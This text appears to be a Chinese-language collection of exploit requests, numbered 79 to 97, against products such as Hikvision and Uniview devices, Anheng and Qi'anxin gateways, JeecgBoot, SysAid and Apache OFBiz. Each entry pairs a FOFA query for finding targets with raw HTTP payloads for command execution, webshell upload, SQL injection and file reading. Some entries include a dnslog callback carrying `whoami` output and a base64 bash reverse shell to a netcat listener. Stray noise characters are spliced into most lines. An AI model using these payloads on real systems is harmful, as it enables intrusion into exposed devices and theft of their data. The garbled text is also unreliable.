------YsOxWxSvj1KyZow1PTsh98fdu6l. e9 ^# h/ u  ~7 l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt". x* C  J- G7 G" K& U0 E1 N
Content-Type: image/png9 I7 l- K6 I" Y

% v+ g5 s( X( b! q9 U7 [YsOxWxSvj1KyZow1PTsh98fdu6l3 \+ A2 k; `$ t# g( q
------YsOxWxSvj1KyZow1PTsh98fdu6l! v; z$ J2 }8 v- _
Content-Disposition: form-data; name="target"
! K/ w- a2 h- Z+ _! e5 Q& _8 f
+ V8 `9 Q" r% A' x( G0 u6 K7 ~/Applications/SkillDevelopAndEHS/& b' u5 j6 E* I9 n3 G- p' H/ A5 j
------YsOxWxSvj1KyZow1PTsh98fdu6l--
- |# V7 ~* y6 |1 }6 J5 _8 X" ~! x6 E( c1 E2 ~$ Q+ {) P& O
! H" @5 \) B: }# G4 O
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
7 x+ _  U) A$ Y% iHost: x.x.x.x: f5 c* N6 g7 Y4 \% r) h
# `+ \$ \3 g# Z

0 h+ |: \1 {+ j79. BYTEVALUE 百为流控路由器远程命令执行
1 W' [* J6 S) \' |FOFA:BYTEVALUE 智能流控路由器
' Z7 ^* ^; x' @7 j. oGET /goform/webRead/open/?path=|id HTTP/1.1
( V) ~. M7 U  u$ k; q$ UHost:IP1 i1 d  e0 G& w9 ^- B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ y2 [: B) Z% T7 L! {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 h5 _* B2 Z2 C4 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 t! F6 C/ o. u9 u, n9 j
Accept-Encoding: gzip, deflate6 u  f3 n# A5 g; m5 v% x0 Z( C# i9 \1 `
Connection: close- ?- W" b9 [7 c4 J
Upgrade-Insecure-Requests: 1! n* o* g7 ^0 B" c( o
  c8 J+ ]/ u6 |5 A' K4 u& h8 B+ T
3 P) @% t7 i: L7 a$ u; X
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
, ?( E6 m" e9 a5 G$ E/ {  C. M0 [6 [FOFA:app="速达软件-公司产品"
  k8 K- w4 m5 I" [2 a4 qPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 j, Z/ r& x$ [, p$ dHost: x.x.x.x
* R* _# j& O* Y  F# _4 k: IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* |' Q1 y6 t: ?6 v* ^6 ^' S4 i
Content-Length: 27
. w: f/ R; {6 u; I  S( IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* e4 u6 n8 r7 R9 v5 l
Accept-Encoding: gzip, deflate0 s8 U' k/ g9 a8 X2 ]; f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, o- l+ Q# e, Y3 v7 b
Connection: close4 ^4 t3 p" i- T1 v
Content-Type: application/octet-stream
+ s2 H4 T/ G, DUpgrade-Insecure-Requests: 1
8 o: M4 \6 w  z& d9 M- b7 b4 o! L" {2 |
<% out.print("oessqeonylzaf");%>+ [, d" Y. L5 ~4 [3 y7 d: Y9 V

4 P4 i0 d! P' g1 R2 q9 S) p5 }$ C; V. y, l
GET /xykqmfxpoas.jsp HTTP/1.16 g" X  Q, \7 ~+ [' }  `
Host: x.x.x.x1 t# U: I) i: v% i' ?' k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 @. I. p$ h; E! e0 T8 P
Connection: close4 e" q& o( u, M
Accept-Encoding: gzip
) h, M9 Y5 ?$ O/ K0 L) g0 f1 ?% ^# g, [8 {" e1 \6 c; v2 ?
! H" p7 N4 }# n8 o* P6 _1 x
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 B$ \  e* P9 S+ XFOFA:app="uniview-视频监控": f; h& x! Y1 {# j+ W4 V
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1  @' C2 z% f! x2 n
Host: x.x.x.x* P% J8 K$ F3 Y7 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 V- o" l- y2 X9 L
Connection: close
/ I7 Q+ ?  m* a8 FAccept-Encoding: gzip
0 j( i8 Q3 w5 s  n
7 G/ @  W! y9 r* n( f% ?0 o9 @: j' P# {, c
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 K* d  q. a. k$ p: VFOFA:app="思福迪-LOGBASE"' n# d+ |, ]3 |, V4 J
POST /bhost/test_qrcode_b HTTP/1.1( }: E; @3 c" I
Host: BaseURL
& g4 ^5 |; l( A8 vUser-Agent: Go-http-client/1.1, ]/ _: W- a, n) I
Content-Length: 23
0 v2 u8 t/ ^2 {$ a. {" L' ~Accept-Encoding: gzip5 t7 }% l# K$ Z) q& O. w- J( \, g
Connection: close8 T% Y$ I! N1 E! i7 t8 X* G8 D" \* b
Content-Type: application/x-www-form-urlencoded. m) M% M7 g4 B! W% Z. b3 V
Referer: BaseURL4 I2 @: F: C6 `7 l, I- f

# A/ Q) n6 b9 V0 I" K9 a; Xz1=1&z2="|id;"&z3=bhost
: G) ^3 c9 d4 [6 x7 u- [8 e/ R
+ {; [6 D% L$ j; L4 \5 O! D
1 ?$ f) S# w( ~$ I9 J  l; `83. JeecgBoot testConnection 远程命令执行  P/ A% d  g" |/ D
FOFA:title=="JeecgBoot 企业级低代码平台"$ \( f$ h/ r6 R/ w

* h/ V$ d6 U6 X1 ^: n( Y, F7 F8 F& y1 _, R# u- U8 x0 ^
POST /jmreport/testConnection HTTP/1.1
4 \9 d8 P2 D; N4 s9 |0 z1 x$ b4 nHost: x.x.x.x
  P; \! p, G/ P! T0 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' w: B9 V" I6 L, q5 t- e) T
Connection: close' h9 B* e, s6 U* U6 g9 X/ j" }( @
Content-Length: 8881
* [: b$ `5 h1 l# w  N6 [& _Accept-Encoding: gzip" P1 l5 D9 D7 J/ H
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO": F9 _2 @, P6 S4 ~0 Y* H
Content-Type: application/json7 q# _% F5 ?" L4 l
1 Q+ W& Q8 @6 W4 {- S6 [; _
PAYLOAD
. u# C8 H1 N& |0 V3 g8 D' L, s: i, p( L) M
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
  Y* Q1 s2 k: O7 M& G% oFOFA:title=="JeecgBoot 企业级低代码平台"2 x  k  D! ^  y8 B: P# n
* ~9 N* s7 r: ]; t* f+ b

. Y1 ?) J' \% c
( D  r0 j2 p& q6 o; ePOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
" Q6 H( ]1 q, _Host: 192.168.40.130:8080. y. ~  \* H4 |; p6 s
User-Agent: curl/7.88.12 e; a5 r( `& c0 y: E& Y
Content-Length: 156( d+ `( |$ [" s6 E; p, @9 p. @
Accept: */*
3 p% u/ [6 h" lConnection: close. T) M5 T  W% j$ N
Content-Type: application/json
  F# F% |$ z& H" k0 }4 ~! ], _3 xAccept-Encoding: gzip
, C% N& Z1 [' X& v8 c9 {. Y: c6 N$ w1 S1 P6 y% o
{
) f; I5 i0 |6 g+ e2 j  [1 [, T8 b* w "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
* K; J: s5 ]2 x5 P* }$ Q  "type": "0"1 ?+ D3 @( J7 y, r! L4 N
}
0 @8 m, z6 Y$ h2 \
5 t) ~5 v' X  A" T8 y& a1 |7 E
" c6 H0 K, I& A85. SysAid On-premise< 23.3.36远程代码执行) U- z8 |, S* x1 K
CVE-2023-47246
3 _; R$ y* ?. U- T; R- y" T' eFOFA:body="sysaid-logo-dark-green.png"
, O" R5 u/ V6 }: X0 g8 N$ mEXP数据包如下,注入哥斯拉马' m, T& K3 T4 ?" ]2 a/ A
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
+ a; _4 p* P/ p0 e" GHost: x.x.x.x
( ?) V# b9 C+ oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 t* b& F. D* |0 ?. Z
Content-Type: application/octet-stream: {. ^( Z9 @( |. ?+ o
Accept-Encoding: gzip' x& T' S: ?9 |% ^# `: t; x

% G% e) _- X$ t) E1 J3 E) OPAYLOAD9 d9 p. q6 R2 L+ b# x+ B
" G' i* m0 y% G! L
回显URL:http://x.x.x.x/userfiles/index.jsp
1 }. `: S0 F5 Z0 F6 b& i1 ]" m: _8 t- {3 c/ G2 H
86. 日本tosei自助洗衣机RCE
0 T& @" x9 n/ |9 ?+ xFOFA:body="tosei_login_check.php"; T: \$ q: n1 z; j$ c, M
POST /cgi-bin/network_test.php HTTP/1.1
) Y" u9 M2 \! b( d3 WHost: x.x.x.x2 z& o- X* ]5 c  @1 L
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 d. P) R" g$ G1 C# c. M
Connection: close
! S1 D$ T4 ~, I5 X4 [. g7 WContent-Length: 44  c2 E: U  ~2 W
Accept: */*
' A$ u5 A7 {& A0 m9 k: fAccept-Encoding: gzip
$ q- o$ M( E5 c0 }5 p* v4 bAccept-Language: en
+ A7 z5 m1 P5 Q. j6 k8 f! u+ P0 KContent-Type: application/x-www-form-urlencoded9 F9 [; c6 M1 {- w1 v
: V) k' i+ _3 X' r- N3 X- B+ E$ {0 u" Y
host=%0acat${IFS}/etc/passwd%0a&command=ping
. r7 C( g6 ~, e+ y" ]$ f' d# r7 y, v) ?
) n( i1 M. F$ m1 y, `
87. 安恒明御安全网关aaa_local_web_preview文件上传
0 t$ t  |  J/ q$ b- S+ S; PFOFA:title="明御安全网关"  c; X9 X+ g) I$ S: ^
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1, |. }7 }; g# h2 @! @" H8 n$ _3 ]& s
Host: X.X.X.X
- [( D! f% @- N& W7 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" [5 ~0 m! d- v0 {% c7 ^. n  A& UConnection: close2 L  u, _9 c5 `! ^; U; U; \" I
Content-Length: 198, v1 X; \( T  b. K: i- R
Accept-Encoding: gzip
1 `4 w+ w+ D9 BContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
' w; U( J" Q8 g5 z% r8 V
! R, S2 J+ `4 L0 |--qqobiandqgawlxodfiisporjwravxtvd
( e5 }, |( Y, @  r* D9 r* LContent-Disposition: form-data; name="123"; filename="9B9Ccd.php") f  F  I6 ~$ L( p5 ~  w
Content-Type: text/plain
9 v- y+ d9 D- z  ^+ M' w6 ^, ?  q! C) e$ l# n
2ZqGNnsjzzU2GBBPyd8AIA7QlDq% @( p6 D2 l, o! N
--qqobiandqgawlxodfiisporjwravxtvd--4 X' A8 E/ P. u# A9 a
  k4 i, h& r, E0 ~7 c. r5 x; }# Z

3 ]! `; W- H2 X) g$ o0 N9 G5 f0 C/jfhatuwe.php9 D8 B. n+ A& `& z6 N8 D
* ^9 }; C5 d$ }% U
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
1 s5 z$ k$ j9 O8 ]( e- E7 x! HFOFA:title="明御安全网关"* s2 u5 I! ~/ Q/ e* G
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1* v+ j" q5 r' o0 E, h0 Y" v6 a  r5 v
Host: x.x.x.xx.x.x.x8 g' }8 }5 Y/ b# ~2 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! P. `* U+ d: f, S  ~8 M) j" F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* O9 {* c( z' d8 j. c
Accept-Encoding: gzip, deflate
) [: g* E: K9 B1 s' E7 M0 O# GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" b% K. `1 B$ B" H+ H1 ?Connection: close
; }: P2 E( T; C2 ]
" l2 p" b* L1 ?  e. V4 h
+ d  p0 q- r6 D2 D4 W/astdfkhl.php$ i2 y3 G0 h4 s  g9 z+ ?8 g4 s( E( J
& N- z- e3 g+ j! E+ f
89. 致远互联FE协作办公平台editflow_manager存在sql注入6 n3 F& W+ e) \9 W6 p% {. r0 K0 ?
FOFA:title="FE协作办公平台" || body="li_plugins_download"4 I/ Z: n1 M# [& F
POST /sysform/003/editflow_manager.js%70 HTTP/1.1* q, c- X( q% A2 z% m
Host: x.x.x.x
# D7 L0 V8 A; vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 c* a7 O8 {6 E' s4 ]+ n. o' ?, J
Connection: close
% G; Q7 `' a  V# H4 W9 G' K2 J0 WContent-Length: 41% A. y2 }, `( Y0 Z2 A3 C$ E% T- S/ A
Content-Type: application/x-www-form-urlencoded
  S$ A, e) }$ ~$ o  eAccept-Encoding: gzip1 K! X& I0 i1 L. l
8 x/ ?# m5 k) Y) c; i
option=2&GUID=-1'+union+select+111*222--+5 ?- p! S5 e  I. j

. P8 X1 V1 N! _" L' B1 @) B5 P/ _  J- K4 Y: U8 J
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行; ~( A3 ?; N* s( r
FOFA:icon_hash="-1830859634"
# @+ n8 M1 k7 i/ @: o6 ^# \POST /php/ping.php HTTP/1.1* u+ s# v# B$ N' `, h/ q) S
Host: x.x.x.x
; x8 O9 L; ?6 [4 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.08 R; r* y5 b) t
Content-Length: 51
; s/ q5 o/ l" RAccept: application/json, text/javascript, */*; q=0.012 J! _) c3 ~6 ]: t; m% {, l  c
Accept-Encoding: gzip, deflate
( B. B* T$ \1 J5 P1 }& qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: [' [4 g& g! ^5 y/ q# ]! ^
Connection: close9 y) m0 Z! j/ ?* W9 S4 p. ^. z
Content-Type: application/x-www-form-urlencoded
7 ~- q" C$ `, U- y" N) UX-Requested-With: XMLHttpRequest
# L! e; p: K4 w2 p& ?, I1 c  Z  y) M3 O
! A& V: r$ k3 j: j& ]jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
* E/ g1 K- V- c1 O/ Y; i; G& x# N& p% h: k

" t9 ^2 O/ E* @7 c' `! h91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取! N- _, T3 C- o
FOFA:title="综合安防管理平台"
% f! _( \0 z/ ^2 o8 f8 QGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1; V2 l! h" ?) ]& ?5 J+ T
Host: your-ip
0 ~7 d( q2 Y4 H( }: `9 A) u8 I7 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 y$ N+ W9 w% _% TAccept-Encoding: gzip, deflate
: _( A' |1 O; L2 a  SAccept: */*
. W0 l! q( e* |( t$ eConnection: keep-alive# ~; {% \7 R8 [( \; Y& n" k/ q* _8 t
2 L: F' Y9 H2 @
) F5 C# f2 M2 e& l6 o# }

. |# H. y: x3 c92. 海康威视运行管理中心session命令执行. R' s% c4 c6 G" K
Fastjson命令执行& C! g) q1 o8 |: Y- q
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
% _" N5 I; P; G  m+ @7 RPOST /center/api/session HTTP/1.1) u- ?) [2 e' {! y0 G; U) r
Host:' R: \" O# U) ]) L
Accept: application/json, text/plain, */*) f0 D# T: b6 D# X0 K
Accept-Encoding: gzip, deflate
. G  M+ M# O9 M, [X-Requested-With: XMLHttpRequest& H( I  }  b7 f/ V# @" @( M! s8 H  M
Content-Type: application/json;charset=UTF-83 M: C% K# V* H( S! U7 Z
X-Language-Type: zh_CN1 B  n" W! x* k; z; B
Testcmd: echo test; H' c% |! P; i+ h+ S0 ^# c7 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36- B. D3 s1 {; M$ S
Accept-Language: zh-CN,zh;q=0.95 f- Y& k/ c; ]' ?3 _
Content-Length: 5778: K8 |2 I! d; T: J' ^& i% S

& C) D6 [1 ]$ x6 C+ R: Y5 r% VPAYLOAD* N: C. q8 \7 a8 h6 c9 Y5 X
  V4 j6 B# g2 ?+ n5 v9 i
7 }2 r4 V  ^) D- |0 s
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ {% {" {- E/ r* I  g( ^FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
9 g0 B& P8 n8 m% D( HPOST /?g=app_av_import_save HTTP/1.1' R  s4 Q6 J/ X/ P1 T
Host: x.x.x.x2 `0 D8 Z, ^/ y  u! ^5 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx* r% Q! }4 v) x" I& `; G- l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 o& ~: q4 A. h$ H& i* ]

( b- C9 ]( `( e9 r. L- B  f6 _% ?------WebKitFormBoundarykcbkgdfx" O3 L: S8 t3 ^8 G, Z
Content-Disposition: form-data; name="MAX_FILE_SIZE"
% b& @) l% q* E& y  F& `: C$ i5 ~" x7 `7 e6 K) A3 a3 g
10000000
0 h7 @) v3 W4 e" t- n8 |$ s------WebKitFormBoundarykcbkgdfx
5 r% K! h' F) D& W' f" [+ mContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
' Z/ A* k7 K' D: eContent-Type: text/plain) M- O* }& `* r

  [$ g% ~6 ^/ Ywagletqrkwrddkthtulxsqrphulnknxa% q" m5 ^8 ~, R. g% a% ~9 {9 n! O' y
------WebKitFormBoundarykcbkgdfx2 J. K/ a. e1 M. m/ J  t; ~
Content-Disposition: form-data; name="submit_post"
5 q$ H& L: }/ V6 u" f( k% Q% A7 C' L
obj_app_upfile) {+ J" _2 q# o, P0 B* l
------WebKitFormBoundarykcbkgdfx$ d6 D& i8 t# E7 W' ^: I* n
Content-Disposition: form-data; name="__hash__". u2 E: T2 a( F6 O8 W& X
- Z) x: l% `1 k. Y4 h# I+ M: G# N
0b9d6b1ab7479ab69d9f71b05e0e9445% e0 J9 t* \  h$ l5 f* A; ]
------WebKitFormBoundarykcbkgdfx--
& c3 l1 x6 @( n8 v  j
1 R4 m' |3 W) `* U7 ]- s, r' r$ W9 d/ H2 M+ Q2 n/ j
GET /attachements/xlskxknxa.txt HTTP/1.1
1 f  ~# J9 M: ]  _% j) |/ \* h$ p4 oHost: xx.xx.xx.xx
; N1 l8 u+ y. r' d7 u( ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' m( \1 ~. |" `0 a8 U2 c7 N
6 H8 [  U$ I! k' n+ n' n4 X' Z
( m; v, t+ `# c) U8 A9 w94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 ^: n2 |, g2 @$ z; T; Y
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ e0 H2 _3 Y* D0 L  S
POST /?g=obj_area_import_save HTTP/1.1
3 L# y( L1 E; f1 L, l, Q- `5 Z$ eHost: x.x.x.x
: |+ C) P- @. X, Y$ aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
5 s% G  K# ?' U& dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; z# Z3 y- i* |1 ]* R
! r+ N2 O7 Z* x: P0 O/ V4 U) j------WebKitFormBoundarybqvzqvmt  n; n' V* e: u1 g1 Z( R+ Q5 [
Content-Disposition: form-data; name="MAX_FILE_SIZE"# \; F- c/ x$ }) Z! R" D; q
' q' ~' G+ o) Z. _4 b6 x
10000000  p! @" @2 o; H! f5 H1 l8 n6 A% v
------WebKitFormBoundarybqvzqvmt: q; G- ?( P: S- P. u, a4 n
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
5 q6 i8 U0 h" x5 NContent-Type: text/plain2 ?" }" ?$ y* V
+ h* Q# h6 t8 l4 O7 A" d1 f
pxplitttsrjnyoafavcajwkvhxindhmu$ t8 `  t) j+ S( Y: Q( g/ E' Q
------WebKitFormBoundarybqvzqvmt% F; u5 _5 c$ E; z2 @( e
Content-Disposition: form-data; name="submit_post"5 [8 r# E6 P5 d! r" r8 z) p9 i' {) s

: p4 |5 L/ z& P& o' N+ Fobj_app_upfile1 f- b) W# x6 A7 V' [2 e9 ~
------WebKitFormBoundarybqvzqvmt1 U, B! b' F1 L
Content-Disposition: form-data; name="__hash__"
  j; h  @4 D# N# |& d. o0 U' t- I" u' e4 T* }' X" t2 B. Y
0b9d6b1ab7479ab69d9f71b05e0e9445
+ a6 T" z1 f' Q* y------WebKitFormBoundarybqvzqvmt--% k! N+ S& Q" j+ Z1 j3 n3 {1 D

; k' U2 X1 I. J& c- e+ i5 t" g! B; V

1 X- M$ p; u. ^3 T% m4 {GET /attachements/xlskxknxa.txt HTTP/1.1
4 V) u3 p  `* B$ PHost: xx.xx.xx.xx
% G$ ~- R4 A9 kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# s% G3 Q- y& y+ K% g' J  c" r
$ Z' J+ q, `5 m+ N7 K0 p* J8 h" v2 D5 p1 U: u: t

7 K. Q# H' s6 ^$ _/ A: u95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
( B- B% |- T! a6 I; O" `" bCVE-2023-490709 I; S- V* a- |: S
FOFA:app="Apache_OFBiz"$ |8 t2 g' W8 D2 Y+ `
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! H1 R; T) B* A9 k$ ^/ b
Host: x.x.x.x
1 r* F  f, y/ d( O% L  b2 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 f% L  i8 V8 [! l5 L) d
Connection: close
# ]+ O" d4 Q4 F0 D6 t  y6 dContent-Length: 889
8 ^6 L% B0 c6 BContent-Type: application/xml% K3 ^, i4 O) D2 h: c- K( L
Accept-Encoding: gzip7 `1 |: z* Y* z0 P

; [5 H# X. K. _<?xml version="1.0"?>
* c2 O/ h; x5 S<methodCall>* O3 M# u% ?; Z( A- f
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>6 K, x* J" z' Y/ q; Y# e- ~
    <params>" `& o" M) U- a! e2 ^
      <param>
. y$ X2 N* W5 r$ ^- v8 }      <value># L7 M6 U: g1 l% i
        <struct>
* X3 l3 M- f( \3 e# E5 D* u9 y- z- H       <member>
2 a- d: @0 [! Q8 \% z* ^2 y          <name>test</name>
# J5 u4 o# ^# n1 v          <value>
9 C6 J$ e3 r/ A      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
: U3 T- |6 L0 x; s5 S          </value>
! J$ H7 h% ^, Q9 |        </member>4 \. ?( g+ _$ o
      </struct>
" u9 A* q* n: G6 x# p      </value>1 X7 \& v/ i& {4 F1 C! w8 b# I1 R
    </param>- ~' H$ e, A8 B3 H
    </params>& A  w2 A3 p0 t! g- R
</methodCall>
) c6 z2 h5 M5 F4 b' e" I3 Z
6 q9 F# w0 F# j& ]8 Y1 z6 E8 U  S* z8 N
用ysoserial生成payload7 U  F5 J7 Y2 @* z1 p
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"9 @  M# H8 Y3 }4 c$ O0 o. W
- g$ r/ i1 s- B1 y, Y: j

/ X# k/ R- n' h" ^3 g/ P' l4 ~: L* v将生成的payload替换到上面的POC
/ e0 e  k* o( Z5 ?! j  W0 mPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 O/ c+ }! L$ R
Host: 192.168.40.130:84437 g# u& }; x  l/ F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- D" ]8 M) n8 H% a0 j& j, h
Connection: close! U" |6 W/ v8 H" p
Content-Length: 8892 s; y& A" E/ _7 `6 M7 c: u
Content-Type: application/xml
; Q+ D" }. V$ TAccept-Encoding: gzip$ v2 C! F; N7 g

' c$ K, k0 f# ?7 v; ?3 F4 }! ZPAYLOAD
5 g2 n1 f5 f6 ^
* c" X8 X: T+ [& A# ^  I96. Apache OFBiz  18.12.11 groovy 远程代码执行
3 ^3 |4 {7 k/ F& U; V: _0 `FOFA:app="Apache_OFBiz"( N: u0 g3 @4 a0 j+ A% l- \
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1, ], n! s7 y7 J: u) a1 l
Host: localhost:8443, |1 l' o" Y0 E. `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- Y" Z3 n& q) G1 Z0 pAccept: */*
' `9 n  D) V- Q! i% i6 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  ^3 {6 [9 R) i1 yContent-Type: application/x-www-form-urlencoded5 T: H& \2 h& S" x+ J! }5 d
Content-Length: 55
5 o9 f& }4 x" N# g) W& o: y6 A) f- f! `/ Z) l1 G1 M, Q
groovyProgram=throw+new+Exception('id'.execute().text);
& H- X) @9 ]' S& L5 V+ s2 l1 E5 D+ n- \  o0 b- e! V

( Z/ s# z. L/ q; D反弹shell
# ?  r9 s$ K6 `0 t% Q在kali上启动一个监听
2 W7 e' e# e' m  }5 B9 hnc -lvp 77779 H2 k2 }) I/ L3 p3 I
1 ]2 Q4 E- n+ i: z8 N
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 }: z  U6 A# l: j' ?# Y
Host: 192.168.40.130:84437 l6 r9 r# f, }# P! W$ H  a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' g+ d' h/ Q6 Q4 NAccept: */*! h4 }9 l$ e$ Z) e' }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' G8 E: o: j3 X/ n" l( t+ C5 D+ e! JContent-Type: application/x-www-form-urlencoded
. _9 Y4 Q( F4 z$ z. _Content-Length: 71. {  `% [/ a7 z" U/ T& m
0 G  f6 u4 E* R9 z2 \3 f) z6 a5 k+ s
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();' \; [# c& J2 e

: }9 Q  q, f- M3 H/ }/ b! M97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行* M0 ^. v$ W  O2 z1 g
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
; S. y/ T. y# |, h- |4 ~0 pGET /passport/login/ HTTP/1.1
; W3 U% w' r6 @Host: 192.168.40.130:8085
( f, p( ^- e0 Y9 z6 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 K, `- }  H5 b1 T3 ?Accept-Encoding: gzip
( [) F6 N$ W+ cConnection: close
1 n( q, y' g3 b0 m; CCookie: rememberMe=PAYLOAD
) _( Y. ~; V/ S; a) V1 PX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
